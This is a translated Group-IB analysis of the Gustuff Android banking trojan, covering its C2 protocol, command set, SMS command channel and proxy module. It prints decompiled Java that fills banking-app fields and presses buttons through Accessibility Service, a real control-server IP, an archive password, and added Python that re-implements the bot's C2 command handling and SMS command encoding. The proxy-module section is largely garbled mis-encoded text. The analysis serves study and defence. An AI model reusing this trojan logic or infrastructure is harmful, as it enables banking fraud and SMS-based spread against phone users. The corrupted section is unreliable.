Source: Group-IB
Ivan Pisarev, a malicious-code analysis specialist at Group-IB, describes in his research how Gustuff works and why it is dangerous.
Who is Gustuff hunting?
Gustuff belongs to a new generation of malware with fully automated functionality. According to its developer, the Trojan is an improved version of the AndyBot malware, which since 2017 has been attacking Android smartphones and stealing money through phishing web forms disguised as the mobile applications of well-known international banks and payment systems. According to Bestoffer, renting the Gustuff bot cost $800 per month.
Analysis of Gustuff samples showed that the Trojan can target customers who use the mobile applications of major banks, including Bank of America, Bank of Scotland, J.P. Morgan, Wells Fargo, Capital One, TD Bank and PNC Bank, and cryptocurrency wallets such as Bitcoin Wallet, BitPay, Cryptopay and Coinbase.
Originally created as a classic banking Trojan, the current version of Gustuff has greatly expanded its list of potential targets. In addition to the Android applications of banks, fintech companies and crypto services, Gustuff targets users of marketplace applications, online stores, payment systems and instant messengers: PayPal, Western Union, eBay, Walmart, Skype, WhatsApp, Gett Taxi, Revolut and others.
Entry point: counting on mass infection
Gustuff uses a classic vector to get onto Android smartphones: SMS messages containing a link to the APK. Once an Android device is infected, the Trojan can, on command from the server, spread further through the contact database of the infected phone or through the server's own database. Gustuff's functionality is designed for mass infection and for maximum capitalization of its operators' business: it has a unique "autofill" function for legitimate mobile banking applications and crypto wallets, which lets the theft of money be carried out faster and at larger scale.
Investigation of the Trojan showed that the autofill function is implemented using Accessibility Service, an Android service intended for people with disabilities. Gustuff is not the first Trojan to bypass, through this Android service, the protection against interaction with the window elements of other applications. However, the use of Accessibility Service in combination with autofill is still quite rare.
After being downloaded onto the victim's phone, Gustuff uses Accessibility Service to interact with the window elements of other applications (banking, cryptocurrency, online shopping, messaging and so on) and to perform the actions the attacker needs. For example, on command from the server the Trojan can press buttons and change the values of text fields in a banking application. Through the Accessibility Service mechanism the Trojan bypasses both the security mechanisms banks use against the previous generation of mobile Trojans and the security policy changes Google has introduced in newer versions of the Android OS. Gustuff also "knows how to" disable Google Play Protect; according to the author, this feature works in 70% of cases.
Gustuff can show fake PUSH notifications carrying the icons of legitimate mobile applications. When the user taps such a notification, a phishing window downloaded from the server opens and asks for bank card or crypto wallet details. In another Gustuff scenario, tapping the notification opens the application the notification was shown for. In that case the malware can, on command from the server and via Accessibility Service, fill a fraudulent transaction into the form fields of the banking application.
Gustuff's functionality also includes sending information about the infected device to the server, reading and sending SMS messages, sending USSD requests, starting a SOCKS5 proxy, following links, sending files (including photos of documents, screenshots and photographs) to the server, and resetting the device to factory settings.
Malware analysis
Before the malicious application is installed, the Android OS shows the user a window with the list of permissions requested by Gustuff.
The application is installed only after the user consents. When it is launched, the Trojan shows the user the following window:
After that its icon is removed.
According to the author, Gustuff is packed with the FTT packer. After launch, the application periodically connects to the CnC server to receive commands. Several of the examined files used the IP address 88.99.171[.]105 as the control server (referred to below as <%CnC%>).
After launch the program starts sending messages to the server at http://<%CnC%>/api/v1/get.php.
The response is expected to be JSON of the following form:
{
  "results": "OK",
  "command": {
    "id": "<%id%>",
    "command": "<%command%>",
    "timestamp": "<%Server Timestamp%>",
    "params": {
      <%Command parameters as JSON%>
    }
  }
}
Each time the application polls the server, it sends information about the infected device. The message format is shown below. Note that the fields full, extra, apps and permission are optional and are sent only when the CnC requests them with the corresponding command.
{
  "info": {
    "info": {
      "cell": <%Sim operator name%>,
      "country": <%Country ISO%>,
      "imei": <%IMEI%>,
      "number": <%Phone number%>,
      "line1Number": <%Phone number%>,
      "advertisementId": <%ID%>
    },
    "state": {
      "admin": <%Has admin rights%>,
      "source": <%String%>,
      "needPermissions": <%Application needs permissions%>,
      "accesByName": <%Boolean%>,
      "accesByService": <%Boolean%>,
      "safetyNet": <%String%>,
      "defaultSmsApp": <%Default Sms Application%>,
      "isDefaultSmsApp": <%Current application is Default Sms Application%>,
      "dateTime": <%Current date time%>,
      "batteryLevel": <%Battery level%>
    },
    "socks": {
      "id": <%Proxy module ID%>,
      "enabled": <%Is enabled%>,
      "active": <%Is active%>
    },
    "version": {
      "versionName": <%Package Version Name%>,
      "versionCode": <%Package Version Code%>,
      "lastUpdateTime": <%Package Last Update Time%>,
      "tag": <%Tag, default value: "TAG"%>,
      "targetSdkVersion": <%Target Sdk Version%>,
      "buildConfigTimestamp": 1541309066721
    }
  },
  "full": {
    "model": <%Device Model%>,
    "localeCountry": <%Country%>,
    "localeLang": <%Locale language%>,
    "accounts": <%JSON array of objects with the "name" and "type" of each account%>,
    "lockType": <%Type of lockscreen password%>
  },
  "extra": {
    "serial": <%Build serial number%>,
    "board": <%Build Board%>,
    "brand": <%Build Brand%>,
    "user": <%Build User%>,
    "device": <%Build Device%>,
    "display": <%Build Display%>,
    "id": <%Build ID%>,
    "manufacturer": <%Build manufacturer%>,
    "model": <%Build model%>,
    "product": <%Build product%>,
    "tags": <%Build tags%>,
    "type": <%Build type%>,
    "imei": <%imei%>,
    "imsi": <%imsi%>,
    "line1number": <%phonenumber%>,
    "iccid": <%Sim serial number%>,
    "mcc": <%Mobile country code of operator%>,
    "mnc": <%Mobile network code of operator%>,
    "cellid": <%GSM-data%>,
    "lac": <%GSM-data%>,
    "androidid": <%Android Id%>,
    "ssid": <%Wi-Fi SSID%>
  },
  "apps": {<%List of installed applications%>},
  "permission": <%List of granted permissions%>
}
Storing configuration data
Gustuff stores operationally important information in a settings file. The name of the file and the names of the parameters inside it are the MD5 hash of the string 15413090667214.6.1<%name%>, where <%name%> is the original name of the value. A Python rendering of the name generation function:
import hashlib

def nameGenerator(input):
    # MD5 of the fixed prefix (build timestamp followed by version 4.6.1) plus the setting name
    return hashlib.md5(("15413090667214.6.1" + input).encode()).hexdigest()
Hereafter this function is written as nameGenerator(input).
Thus the name of the first file is nameGenerator("API_SERVER_LIST"), and it contains values with the following names:
Variable name | Value |
---|---|
nameGenerator("API_SERVER_LIST") | Contains the list of CnC addresses as an array. |
nameGenerator("API_SERVER_URL") | Contains the CnC address. |
nameGenerator("SMS_UPLOAD") | Flag, set by default. If set, SMS messages are sent to the CnC. |
nameGenerator("SMS_ROOT_NUMBER") | Phone number to which SMS messages received by the infected device are forwarded. Default is null. |
nameGenerator("SMS_ROOT_NUMBER_RESEND") | Flag, cleared by default. If set, an SMS received by the infected device is forwarded to the root number. |
nameGenerator("DEFAULT_APP_SMS") | Flag, cleared by default. If set, the application processes incoming SMS messages. |
nameGenerator("DEFAULT_ADMIN") | Flag, cleared by default. If set, the application has administrator rights. |
nameGenerator("DEFAULT_ACCESSIBILITY") | Flag, cleared by default. If set, the service that uses Accessibility Service is running. |
nameGenerator("APPS_CONFIG") | JSON object with the list of actions to perform when an Accessibility event associated with a specific application fires. |
nameGenerator("APPS_INSTALLED") | Stores the list of applications installed on the device. |
nameGenerator("IS_FIST_RUN") | Flag, reset on first launch. |
nameGenerator("UNIQUE_ID") | Contains a unique identifier, generated when the bot is first launched. |
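The key derivation is easy to reproduce, and the direction an analyst actually needs is the reverse one: resolving the hashed keys found in a SharedPreferences dump back to the setting names in the table. The following Python block is an added example for this page, not code from the Group-IB analysis or from the sample. It reuses the prefix and the setting names given above and parses a constructed SharedPreferences XML; the values in it are placeholders and cnc.invalid is a reserved test name.

```python
import hashlib
import xml.etree.ElementTree as ET

# Prefix from the analysis: build timestamp 1541309066721 followed by version 4.6.1.
PREFIX = "15413090667214.6.1"

# Plaintext setting names listed in the analysis.
KNOWN_NAMES = [
    "API_SERVER_LIST", "API_SERVER_URL", "SMS_UPLOAD", "SMS_ROOT_NUMBER",
    "SMS_ROOT_NUMBER_RESEND", "DEFAULT_APP_SMS", "DEFAULT_ADMIN",
    "DEFAULT_ACCESSIBILITY", "APPS_CONFIG", "APPS_INSTALLED", "IS_FIST_RUN",
    "UNIQUE_ID",
]


def name_generator(name: str) -> str:
    """MD5(PREFIX + name) as lowercase hex: the key derivation described for the sample."""
    return hashlib.md5((PREFIX + name).encode("utf-8")).hexdigest()


def build_lookup(names=KNOWN_NAMES) -> dict:
    """Map derived key -> plaintext name so that keys found on disk can be resolved."""
    return {name_generator(n): n for n in names}


def resolve_prefs(xml_text: str, names=KNOWN_NAMES) -> dict:
    """Parse a SharedPreferences XML dump and rename keys that match a known setting.

    Keys that do not match are kept under their hash so nothing is silently dropped.
    """
    lookup = build_lookup(names)
    resolved = {}
    for elem in ET.fromstring(xml_text):
        key = elem.get("name")
        if key is None:
            continue
        # <string> keeps its value as element text; <boolean>/<int>/<long> use a value attribute.
        value = elem.text if elem.tag == "string" else elem.get("value")
        resolved[lookup.get(key, key)] = value
    return resolved


# Constructed SharedPreferences dump, not taken from a device: the keys are derived with
# the function above, the values are placeholders.
SAMPLE_PREFS = f"""<map>
    <string name="{name_generator('API_SERVER_URL')}">http://cnc.invalid/api/v1/</string>
    <boolean name="{name_generator('SMS_UPLOAD')}" value="true" />
    <boolean name="{name_generator('DEFAULT_ADMIN')}" value="false" />
    <string name="{name_generator('UNIQUE_ID')}">bot-0001</string>
    <string name="0123456789abcdef0123456789abcdef">not a known setting</string>
</map>"""

if __name__ == "__main__":
    for hashed, plain in sorted(build_lookup().items(), key=lambda kv: kv[1]):
        print(f"{plain:24s} {hashed}")
    print(resolve_prefs(SAMPLE_PREFS))
```

The API_SERVER_LIST value is described above as a Base85-encoded array; the analysis does not say which Base85 alphabet the sample uses, so the block leaves that value undecoded.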
Module for processing server commands
The application stores the CnC server addresses as an array encoded as a Base85 string. The list of CnC servers can be changed when the corresponding command is received, in which case the new addresses are saved to the settings file.
In response to the request, the server sends the application a command. Note that commands and their parameters are in JSON format. The application can process the following commands:
Name | Description |
---|---|
forwardStart | Starts sending the SMS messages received by the infected device to the CnC server. |
forwardStop | Stops sending the SMS messages received by the infected device to the CnC server. |
ussdRun | Executes a USSD request. The number to which the request must be made is in the JSON field "number". |
sendSms | Sends one SMS message (split into several parts if necessary). As a parameter the command receives a JSON object with the fields "to" (destination number) and "body" (message text). |
sendSmsAb | Sends an SMS message (split into several parts if necessary) to everyone in the contact list of the infected device. The interval between messages is 10 seconds. The message text is in the JSON field "body". |
sendSmsMass | Sends SMS messages (split into several parts if necessary) to the contacts specified in the command parameters. The interval between messages is 10 seconds. As a parameter the command receives a JSON array (the "sms" field) whose elements contain the fields "to" (destination number) and "body" (message text). |
changeServer | The command can receive as a parameter a value with the key "url", in which case the bot changes the value of nameGenerator("SERVER_URL"), or with the key "array", in which case the bot writes the array to nameGenerator("API_SERVER_LIST"). In this way the application changes the address of its CnC server. |
adminNumber | The command manages the root number. It accepts a JSON object with the following parameters: "number" changes nameGenerator("ROOT_NUMBER") to the received value; "resend" changes nameGenerator("SMS_ROOT_NUMBER_RESEND"); "sendId" sends the unique ID to nameGenerator("ROOT_NUMBER"). |
updateInfo | Sends information about the infected device to the server. |
wipeData | The command deletes user data. Depending on which user the application is running as, either the data is wiped completely together with a reboot of the device (primary user) or only the user data is deleted (secondary user). |
socksStart | Starts the proxy module. The operation of the module is described in a separate section. |
socksStop | Stops the proxy module. |
openLink | Follows a link. The link is in the JSON parameter under the key "url". "android.intent.action.VIEW" is used to open the link. |
uploadAllSms | Sends all SMS messages received by the device to the server. |
uploadAllPhotos | Sends images from the infected device to a URL. The URL is passed as a parameter. |
uploadFile | Sends a file from the infected device to a URL. The URL is passed as a parameter. |
uploadPhoneNumbers | Sends phone numbers from the contact list to the server. If a JSON object with the key "ab" is received as a parameter, the application takes the contact list from the phone book. If a JSON object with the key "sms" is received, the application builds the contact list from the senders of SMS messages. |
changeArchive | The application downloads a file from the address passed as a parameter under the key "url". The downloaded file is saved under the name "archive.zip". The application then unpacks it, optionally using the archive password "b5jXh37gxgHBrZhQ4j3D". The unpacked files are saved in the [external storage]/hgps directory, which is where the application keeps its web fakes (described below). |
actions | The command works with the Actions service, which is described in a separate section. |
test | Does nothing. |
download | The command downloads a file from the remote server and saves it in the "Downloads" directory. The URL and the file name are passed as the fields "url" and "fileName" of the JSON parameter object, respectively. |
remove | Deletes a file from the "Downloads" directory. The file name is passed in the JSON parameter under the key "fileName". The standard file name is "tmp.apk". |
notification | Shows a notification whose description and title text are defined by the control server. |
Format of the notification command:
{
  "results": "OK",
  "command": {
    "id": <%id%>,
    "command": "notification",
    "timestamp": <%Server Timestamp%>,
    "params": {
      "openApp": <%Open original app or not%>,
      "array": [
        {
          "title": <%Title text%>,
          "desc": <%Description text%>,
          "app": <%Application name%>
        }
      ]
    }
  }
}
The notification generated by the examined file looks identical to a notification generated by the application named in the app field. If the openApp field is True, opening the notification launches the application named in the app field. If openApp is False, one of the following happens:
- a phishing window opens whose content is loaded from the directory <%external storage%>/hgps/<%file name%>
- a phishing window opens whose content is downloaded from the server at <%url%>?id=<%Bot id%>&app=<%application name%>
- a phishing window disguised as a Google Play card opens and asks the user to enter card details.
The application sends the result of the command to <%CnC%>/api/v1/set_state.php as a JSON object of the following form:
{
  "command": {
    "command": <%command%>,
    "id": <%command_id%>,
    "state": <%command_state%>
  },
  "id": <%bot_id%>
}
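To make the get.php/set_state.php exchange concrete, the Python block below is an added example, not the sample's code and not from the Group-IB analysis. It validates a get.php reply, applies a few of the commands from the table above to an in-memory bot state, and builds the set_state.php report. The state strings "OK", "ERROR" and "UNKNOWN", the BotState class and the server replies are constructed for the example (the analysis does not list the possible command_state values); backup.invalid is a reserved test name.

```python
import json

# Control-server address from the analysis, in the path layout the sample uses.
DEFAULT_SERVER = "http://88.99.171.105/api/v1/"


class BotState:
    """In-memory stand-in for the sample's settings file (constructed for this example)."""

    def __init__(self, bot_id: str):
        self.bot_id = bot_id
        self.server_url = DEFAULT_SERVER   # nameGenerator("API_SERVER_URL")
        self.server_list = []              # nameGenerator("API_SERVER_LIST")
        self.root_number = None            # nameGenerator("SMS_ROOT_NUMBER")
        self.resend = False                # nameGenerator("SMS_ROOT_NUMBER_RESEND")
        self.outbox = []                   # SMS the bot would send: (to, body)


def parse_get_response(raw: str) -> dict:
    """Validate a get.php response and return its command object."""
    doc = json.loads(raw)
    if doc.get("results") != "OK":
        raise ValueError("server did not answer with results=OK")
    cmd = doc.get("command")
    if not isinstance(cmd, dict):
        raise ValueError("response carries no command object")
    for key in ("id", "command", "params"):
        if key not in cmd:
            raise ValueError(f"command is missing '{key}'")
    return cmd


def handle_command(state: BotState, cmd: dict) -> str:
    """Apply a command to the bot state and return a state string for set_state.php.

    "OK", "ERROR" and "UNKNOWN" are assumed values; the analysis does not list them.
    """
    name, params = cmd["command"], cmd["params"]
    if name == "test":
        return "OK"
    if name == "changeServer":
        if "url" in params:
            state.server_url = params["url"]
        elif "array" in params:
            state.server_list = list(params["array"])
        else:
            return "ERROR"
        return "OK"
    if name == "adminNumber":
        state.root_number = params.get("number", state.root_number)
        state.resend = bool(params.get("resend", state.resend))
        return "OK"
    if name == "sendSms":
        state.outbox.append((params["to"], params["body"]))
        return "OK"
    if name == "sendSmsMass":
        for item in params["sms"]:
            state.outbox.append((item["to"], item["body"]))
        return "OK"
    return "UNKNOWN"


def build_set_state(state: BotState, cmd: dict, result: str) -> str:
    """Serialize the result in the shape the sample posts to set_state.php."""
    return json.dumps({
        "command": {"command": cmd["command"], "id": cmd["id"], "state": result},
        "id": state.bot_id,
    })


def run_exchange(state: BotState, raw_response: str) -> dict:
    """One poll cycle: parse the server's reply, act on it, produce the report."""
    cmd = parse_get_response(raw_response)
    result = handle_command(state, cmd)
    return json.loads(build_set_state(state, cmd, result))


# Constructed server replies (not captured traffic).
SAMPLE_RESPONSES = [
    json.dumps({"results": "OK", "command": {
        "id": "101", "command": "changeServer", "timestamp": "1541309066",
        "params": {"url": "http://backup.invalid/api/v1/"}}}),
    json.dumps({"results": "OK", "command": {
        "id": "102", "command": "sendSmsMass", "timestamp": "1541309070",
        "params": {"sms": [{"to": "+10000000001", "body": "hi"},
                           {"to": "+10000000002", "body": "hi"}]}}}),
    json.dumps({"results": "OK", "command": {
        "id": "103", "command": "noSuchCommand", "timestamp": "1541309075",
        "params": {}}}),
]

if __name__ == "__main__":
    bot = BotState("bot-0001")
    for raw in SAMPLE_RESPONSES:
        print(run_exchange(bot, raw))
    print("server:", bot.server_url, "outbox:", bot.outbox)
```

A sandbox that plays the server side only has to produce the reply objects above and read the set_state.php posts back; the bot identifier it needs is the one reported in the "id" field of the device information message.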
Actions service
The list of commands processed by the application includes actions. When the command handling module receives this command, it calls the Actions service to execute the extended command. The service accepts a JSON object as a parameter and can execute the following commands:
1. PARAMS_ACTION: on receiving such a command, the service first takes the value of the Type key from the JSON parameter, which can be one of:
- serviceInfo: the subcommand reads the value under the key includeNotImportantViews from the JSON parameter. If the flag is True, the application sets the FLAG_ISOLATED_PROCESS flag for the Accessibility Service, so that the service is started in a separate process. (Note that the key name matches AccessibilityServiceInfo.FLAG_INCLUDE_NOT_IMPORTANT_VIEWS, which has the same numeric value, 0x2, as ServiceInfo.FLAG_ISOLATED_PROCESS; a decompiler resolving the raw constant can report either name.)
- root: receives information about the currently focused window and sends it to the server. The application obtains the information through the AccessibilityNodeInfo class.
- admin: requests administrator rights.
- delay: pauses the ActionsService for the number of milliseconds given in the "data" key of the parameters.
- windows: sends the list of windows visible to the user.
- install: installs an application on the infected device. The name of the package archive is in the "fileName" key; the archive itself is in the Downloads directory.
- global: the subcommand navigates from the current window to one of the following:
- the quick settings menu
- back
- home
- notifications
- the recently opened applications window
- launch: launches an application. The application name is passed as a parameter under the key data.
- sounds: switches the s	ound mode to silent.
- unlock: turns on the screen and keyboard backlight at maximum brightness. The application does this with a WakeLock, using the string [Application label]:INFO as the tag.
- permissionOverlay: the function is not implemented (the response to the command is {"message":"Not support"} or {"message":"low sdk"}).
- gesture: the function is not implemented (the response to the command is {"message":"Not support"} or {"message":"Low API"}).
- permissions: this command is intended to request permissions for the application. However, the query function is not implemented, so the command has no effect. The list of requested permissions is passed as a JSON array under the key "permissions". The standard list:
- android.permission.READ_PHONE_STATE
- android.permission.READ_CONTACTS
- android.permission.CALL_PHONE
- android.permission.RECEIVE_SMS
- android.permission.SEND_SMS
- android.permission.READ_SMS
- android.permission.READ_EXTERNAL_STORAGE
- android.permission.WRITE_EXTERNAL_STORAGE
- open: shows a phishing window. Depending on the parameters received from the server, the application can show one of the following phishing windows:
- a phishing window whose content is written to the file <%external dir%>/hgps/<%param_filename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
- a phishing window whose content is preloaded from the address <%url_param%>?id=<%bot_id%>&app=<%packagename%>. The result of the user's interaction with the window is sent to <%CnC%>/records.php
- a phishing window disguised as a Google Play card.
- interactive: this command interacts with the window elements of other applications through AccessibilityService. A special service is implemented for the interaction. The examined application can interact with windows that are:
- currently active; in this case the parameters contain the ID or the text (name) of the object to interact with;
- visible to the user at the moment the command is executed; the application selects the window by ID.
Having received AccessibilityNodeInfo objects for the target window elements, the application can, depending on the parameters, perform the following actions:
- focus: sets focus on the object.
- click: clicks the object.
- actionId: performs an action by its ID.
- setText: changes the object's text. The text can be changed in two ways: by performing the ACTION_SET_TEXT action (if the Android version of the infected device is LOLLIPOP or newer) or by placing the string on the clipboard and pasting it into the object (for older versions). This command can be used to change data in a banking application.
2. PARAMS_ACTIONS: the same as PARAMS_ACTION, except that a JSON array of commands arrives.
Many will be interested in what the function for interacting with the window elements of other applications looks like. Here is how it is implemented in Gustuff (decompiled output, lightly cleaned up: the duplicate "count" variable of the raw decompilation is split into "repeat" and "count", the call to performSetTextAction matches its definition below, and the constants 1 and 16 are ACTION_FOCUS and ACTION_CLICK):
boolean interactiveAction(List<AccessibilityNodeInfo> aiList, JSONObject action, JsonObject res) {
    int repeat = action.optInt("repeat", 1);   // how many times to apply the action to each node
    int count = 0;                             // number of successful actions, reported to the server
    for (AccessibilityNodeInfo ani : aiList) {
        for (int index = 1; index <= repeat; ++index) {
            if (action.has("focus")) {
                if (ani.performAction(AccessibilityNodeInfo.ACTION_FOCUS)) {      // 1
                    ++count;
                }
            } else if (action.has("click")) {
                if (ani.performAction(AccessibilityNodeInfo.ACTION_CLICK)) {      // 16
                    ++count;
                }
            } else if (action.has("actionId")) {
                if (ani.performAction(action.optInt("actionId"))) {               // arbitrary action by ID
                    ++count;
                }
            } else if (action.has("setText")) {
                Context context = this.getApplicationContext();
                String text = action.optString("setText");
                if (performSetTextAction(context, ani, text)) {
                    ++count;
                }
            }
        }
        ani.recycle();   // release the node once the action has been applied
    }
    res.addProperty("res", count);
    return count > 0;
}
The text replacement function:
boolean performSetTextAction(Context context, AccessibilityNodeInfo ani, String text) {
    boolean result;
    if (Build.VERSION.SDK_INT >= 21) {   // Lollipop and newer: set the text directly
        Bundle b = new Bundle();
        b.putCharSequence(AccessibilityNodeInfo.ACTION_ARGUMENT_SET_TEXT_CHARSEQUENCE, text);
        result = ani.performAction(AccessibilityNodeInfo.ACTION_SET_TEXT, b);   // 0x200000
    } else {                             // older releases: go through the clipboard
        ClipboardManager clipboard = (ClipboardManager) context.getSystemService(Context.CLIPBOARD_SERVICE);
        if (clipboard != null) {
            clipboard.setPrimaryClip(ClipData.newPlainText("autofill_pm", text));
            result = ani.performAction(AccessibilityNodeInfo.ACTION_PASTE);     // 0x8000
        } else {
            result = false;
        }
    }
    return result;
}
Thus, with a correctly configured control server, Gustuff can fill in the text fields of a banking application and click the buttons needed to complete a transaction. The Trojan does not even need to log in to the application: it is enough to send the command to show a PUSH notification and then open the previously installed banking application. The user authenticates, and Gustuff does the rest.
SMS message processing module
The application installs an event handler for the SMS messages received by the infected device. The examined application can receive commands from the operator in the body of an SMS. The command has the form:
7!5=<%Base64-encoded command%>
The application searches all incoming SMS messages for the string 7!5=. When it finds it, it decodes the Base64 string starting at offset 4 and executes the command. The commands are similar to the CnC commands. The result of execution is sent to the same number the command came from. Response format:
7*5=<%Base64 of "result_code command"%>
Optionally, the application can forward all received messages to the root number. For this, the root number must be set in the settings file and the message redirect flag must be set. SMS messages are sent to the attacker's number in the format:
<%From number%> - <%Time in the format dd/MM/yyyy HH:mm:ss%> <%SMS body%>
Also optionally, the application can send messages to the CnC. SMS messages are sent to the server in JSON format:
{
"id":<%BotID%>,
"sms":
{
"text":<%SMS body%>,
"number":<%From number%>,
"date":<%Timestamp%>
}
}
If the nameGenerator("DEFAULT_APP_SMS") flag is set, the application stops processing the SMS message and clears the list of incoming messages.
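The SMS command channel described above, as an added Python example (not code from the sample or from the Group-IB analysis): it encodes and decodes the 7!5= and 7*5= messages, treats a payload that is not valid Base64 as an ordinary SMS instead of crashing the handler, and models the forward-to-root-number path with the dd/MM/yyyy HH:mm:ss format. The result codes "0" and "1" and the set of commands the model "executes" are assumptions made for the example; the phone numbers and the timestamp are constructed.

```python
import base64
import binascii
from datetime import datetime

CMD_MARKER = "7!5="    # prefix of an operator command inside an SMS body
RESP_MARKER = "7*5="   # prefix of the bot's reply


def build_sms_command(command: str) -> str:
    """Encode a command the way the operator would put it into an SMS."""
    return CMD_MARKER + base64.b64encode(command.encode("utf-8")).decode("ascii")


def extract_sms_command(body: str):
    """Return the decoded command if the body carries the marker, otherwise None.

    Decoding starts right after the 4-character marker, as the sample does. A payload
    that is not valid Base64 (or not UTF-8) is treated as an ordinary SMS.
    """
    pos = body.find(CMD_MARKER)
    if pos < 0:
        return None
    payload = body[pos + len(CMD_MARKER):].strip()
    try:
        return base64.b64decode(payload, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def build_sms_response(result_code: str, command: str) -> str:
    """7*5=<Base64 of "result_code command">, the reply format from the analysis."""
    return RESP_MARKER + base64.b64encode(f"{result_code} {command}".encode("utf-8")).decode("ascii")


def decode_sms_response(text: str):
    """Inverse of build_sms_response: returns (result_code, command)."""
    if not text.startswith(RESP_MARKER):
        raise ValueError("not a 7*5= reply")
    code, _, command = base64.b64decode(text[len(RESP_MARKER):]).decode("utf-8").partition(" ")
    return code, command


def format_forwarded_sms(sender: str, when: datetime, body: str) -> str:
    """Format used when the sample relays an incoming SMS to the root number."""
    return f"{sender} - {when.strftime('%d/%m/%Y %H:%M:%S')} {body}"


def process_incoming(sender: str, body: str, when: datetime, root_number=None, resend=False):
    """Model the handler: returns (reply_to_sender, forward_to_root); either may be None.

    Result codes are an assumption for this example: "0" when the command is one the
    model executes ("test" or "updateInfo"), "1" otherwise.
    """
    reply = forward = None
    command = extract_sms_command(body)
    if command is not None:
        code = "0" if command in ("test", "updateInfo") else "1"
        reply = (sender, build_sms_response(code, command))
    if resend and root_number:
        forward = (root_number, format_forwarded_sms(sender, when, body))
    return reply, forward


# Constructed input: an operator SMS and the time it arrived.
SAMPLE_TIME = datetime(2019, 3, 1, 12, 30, 5)
SAMPLE_SMS = build_sms_command("test")

if __name__ == "__main__":
    print(process_incoming("+15550001", SAMPLE_SMS, SAMPLE_TIME, "+15559999", True))
    print(process_incoming("+15550002", "your code is 1234", SAMPLE_TIME, "+15559999", True))
```

On the defensive side the same extract_sms_command check is a usable detector: a Base64 blob directly after "7!5=" in an SMS body has no legitimate reason to appear on a managed device.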
Proxy module
The examined application contains a Backconnect Proxy module (referred to below as the proxy module) with a separate class whose static fields hold its configuration. The configuration data is stored in the sample in clear text.
All actions performed by the proxy module are logged to files. For this the application creates a directory named "logs" in external storage (the ProxyConfigClass.logsDir field of the configuration class) in which it keeps the log files. Logs are written to files with the following names:
- main.txt: the work of the class named CommandServer is logged to this file. Below, writing the string str to this file is denoted mainLog(str).
- session-<%id%>.txt: this file holds the log data associated with a specific proxy session. Below, writing the string str to this file is denoted sessionLog(str).
- server.txt: this file receives all data written to the files above.
Log data format:
<%Date%> [Thread[<%thread id%>], id[]]: log string
Exceptions that occur while the proxy module is running are also logged. For this the application builds a JSON object of the following form:
{
  "uncaughtException": <%short description of throwable%>,
  "thread": <%thread%>,
  "message": <%detail message of throwable%>,
  "trace": [            // stack trace, one object per frame
    {
      "ClassName": ...,
      "FileName": ...,
      "LineNumber": ...,
      "MethodName": ...
    },
    {
      "ClassName": ...,
      "FileName": ...,
      "LineNumber": ...,
      "MethodName": ...
    }
  ]
}
次ã«ããããæååè¡šçŸã«å€æããŠãã°ã«èšé²ããŸãã
ãããã· ã¢ãžã¥ãŒã«ã¯ã察å¿ããã³ãã³ããåä¿¡ããåŸã«èµ·åãããŸãã ãããã· ã¢ãžã¥ãŒã«ãèµ·åããã³ãã³ããåä¿¡ãããšãã¢ããªã±ãŒã·ã§ã³ã¯ ãšåŒã°ãããµãŒãã¹ãéå§ããŸãã ã¡ã€ã³ãµãŒãã¹ããããã· ã¢ãžã¥ãŒã«ã®åäœã®ç®¡çãã€ãŸãéå§ãšåæ¢ãæ åœããŸãã
ãµãŒãã¹éå§ã®æ®µé:
1. XNUMX åã« XNUMX åå®è¡ãããã¿ã€ããŒãéå§ãããããã· ã¢ãžã¥ãŒã«ã®ã¢ã¯ãã£ããã£ããã§ãã¯ããŸãã ã¢ãžã¥ãŒã«ãã¢ã¯ãã£ãã§ãªãå Žåã¯ãã¢ãžã¥ãŒã«ãèµ·åãããŸãã
ã€ãã³ããããªã¬ãŒããããšãã android.net.conn.CONNECTIVITY_CHANGE ãããã·ã¢ãžã¥ãŒã«ãèµ·åããŸãã
2. ã¢ããªã±ãŒã·ã§ã³ã¯ãã©ã¡ãŒã¿ã䜿çšããŠãŠã§ã€ã¯ããã¯ãäœæããŸã ããŒã·ã£ã«_ãŠã§ã€ã¯_ãã㯠ãããŠåœŒãæãŸããŸãã ããã«ãããããã€ã¹ã® CPU ãã¹ãªãŒã ã¢ãŒãã«ãªãã®ãé²ããŸãã
3. ãããã·ã¢ãžã¥ãŒã«ã®ã³ãã³ãåŠçã¯ã©ã¹ãèµ·åããæåã«è¡ããã°ã«èšé²ããŸãã mainLog("ãµãŒããŒã®èµ·å") О
Server::start() host[<%proxy_cnc%>]ãcommandPort[<%command_port%>]ãproxyPort[<%proxy_port%>]
ã©ã proxy_cncãcommand_portãããã³ proxy_port â ãããã·ãµãŒããŒèšå®ããååŸãããã©ã¡ãŒã¿ã
ã³ãã³ãåŠçã¯ã©ã¹ãåŒã³åºãããŸãã ã³ãã³ãæ¥ç¶ã èµ·åçŽåŸã«æ¬¡ã®ã¢ã¯ã·ã§ã³ãå®è¡ããŸãã
4. ã«æ¥ç¶ããŸã ProxyConfigClass.host: ProxyConfigClass.commandPort ãããŠãææããããã€ã¹ã«é¢ããããŒã¿ã JSON 圢åŒã§éä¿¡ããŸãã
{
"id":<%id%>,
"imei":<%imei%>,
"imsi":<%imsi%>,
"model":<%model%>,
"manufacturer":<%manufacturer%>,
"androidVersion":<%androidVersion%>,
"country":<%country%>,
"partnerId":<%partnerId%>,
"packageName":<%packageName%>,
"networkType":<%networkType%>,
"hasGsmSupport":<%hasGsmSupport%>,
"simReady":<%simReady%>,
"simCountry":<%simCountry%>,
"networkOperator":<%networkOperator%>,
"simOperator":<%simOperator%>,
"version":<%version%>
}
where:
- id: the identifier. The module tries to read the "id" field from the shared settings file named "x"; if the value cannot be obtained, a new one is generated. The proxy module thus has its own identifier, generated in the same way as the bot ID.
- imei: the IMEI of the device. If an error occurs while obtaining the value, an error text message is written to this field instead.
- imsi: the International Mobile Subscriber Identity of the device. If an error occurs while obtaining the value, an error text message is written to this field instead.
- model: the end-user-visible name of the end product.
- manufacturer: the manufacturer of the product/hardware (Build.MANUFACTURER).
- androidVersion: a string of the form "<%release_version%> (<%os_version%>),<%sdk_version%>".
- country: the current location of the device.
- partnerId: an empty string.
- packageName: the package name.
- networkType: the type of the current network connection (for example "WIFI" or "MOBILE"). Returns null on error.
- hasGsmSupport: true if the phone supports GSM, otherwise false.
- simReady: the SIM card state.
- simCountry: the ISO country code (based on the SIM provider).
- networkOperator: the operator name. If an error occurs while obtaining the value, an error text message is written to this field instead.
- simOperator: the service provider name (SPN). If an error occurs while obtaining the value, an error text message is written to this field instead.
- version: this field is stored in the configuration class; in the tested versions it equals "1.6".
